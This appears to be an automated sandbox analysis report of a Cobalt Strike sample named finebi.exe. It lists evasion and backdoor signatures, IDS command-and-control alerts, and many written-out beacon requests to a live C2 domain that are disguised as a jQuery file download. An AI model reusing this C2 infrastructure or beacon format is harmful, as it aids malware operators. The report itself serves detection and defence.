Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
finebi.exe

Overview

General Information

Sample name:finebi.exe
Analysis ID:1639429
MD5:ef0821209a3166e8142f5d170708b114
SHA1:653b95b24480dd60982e95e19f15c736321cbade
SHA256:47abbb7ad1ca5dea21674694dbe2dd59ebd4be8ce2fc15554c68574614f3d136
Tags:CobaltStrikeexeuser-kafan_shengui
Infos:

Detection

Score:68
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Contains functionality to detect sleep reduction / modifications
Joe Sandbox ML detected suspicious sample
Performs DNS queries to domains with low reputation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • finebi.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\finebi.exe" MD5: EF0821209A3166E8142F5D170708B114)
    • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Communication To Uncommon Destination Ports
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\finebi.exe, Initiated: true, ProcessId: 7480, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49720

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-15T15:56:06.960162+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:56:39.041066+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:56:51.417022+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:56:59.556492+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:57:07.481185+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:57:21.541100+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:57:31.902127+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:57:46.135115+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:57:57.212918+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:58:10.009853+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:58:20.525464+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:58:35.664234+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:58:42.822479+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:58:54.307172+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:59:05.715244+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP
2025-03-15T15:59:13.246006+010020330091Malware Command and Control Activity Detected188.114.97.38080192.168.2.549722TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0udAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js.Avira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06Avira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsnsockAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0uAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsDAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0uLAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsward-Avira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js-Avira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06FAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz/jquery-3.3.1.min.jsAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsUmAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jsAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0utAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0usAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js0u4Avira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jswardAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.jstAvira URL Cloud: Label: malware
Source: http://apiapi.mmkinskfn.xyz:8080/jquery-3.3.1.min.js11b87bd06dAvira URL Cloud: Label: malware
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.9% probability
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA9DC0 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00007FF75DAA9DC0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA1220 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,clock,clock,clock,clock,clock,clock,0_2_00007FF75DAA1220
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAB56A0 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,0_2_00007FF75DAB56A0
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DAA1390 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00007FF75DAA1390
Source: finebi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA95F00 malloc,memset,strncmp,GetCurrentDirectoryA,strncat_s,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00007FF75DA95F00
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA96460 malloc,FindFirstFileA,free,malloc,malloc,free,free,FindNextFileA,FindClose,0_2_00007FF75DA96460

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 188.114.97.3:8080 -> 192.168.2.5:49722
Performs DNS queries to domains with low reputation
Source: DNS query: apiapi.mmkinskfn.xyz
Source: global trafficTCP traffic: 192.168.2.5:49720 -> 188.114.97.3:8080
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\finebi.exeCode function: 0_2_00007FF75DA9D0F0 memset,HttpOpenRequestA,HttpSendRequestA,InternetCloseHandle,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF75DA9D0F0
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.min.js HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: apiapi.mmkinskfn.xyzAccept-Encoding: gzip, deflateCookie: __cfduid=MroQn6eH6gh3DMGdAAaQOw_eDXCDoxXqU5mxLkCNbXnYUmtQqBjn_1-P3eMn0pAgeN0d4V_vz6JQpDObSHVT2RHv1WGJ-UyuC_ya2xfL3EW8tooPVj05kSsMai3TWxT4N0E6-_eomQUt0NDt-shrOaUCDWjkqd1wsmC_OVcZKFwUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Connection: Keep-AliveCache-Control: no-cache
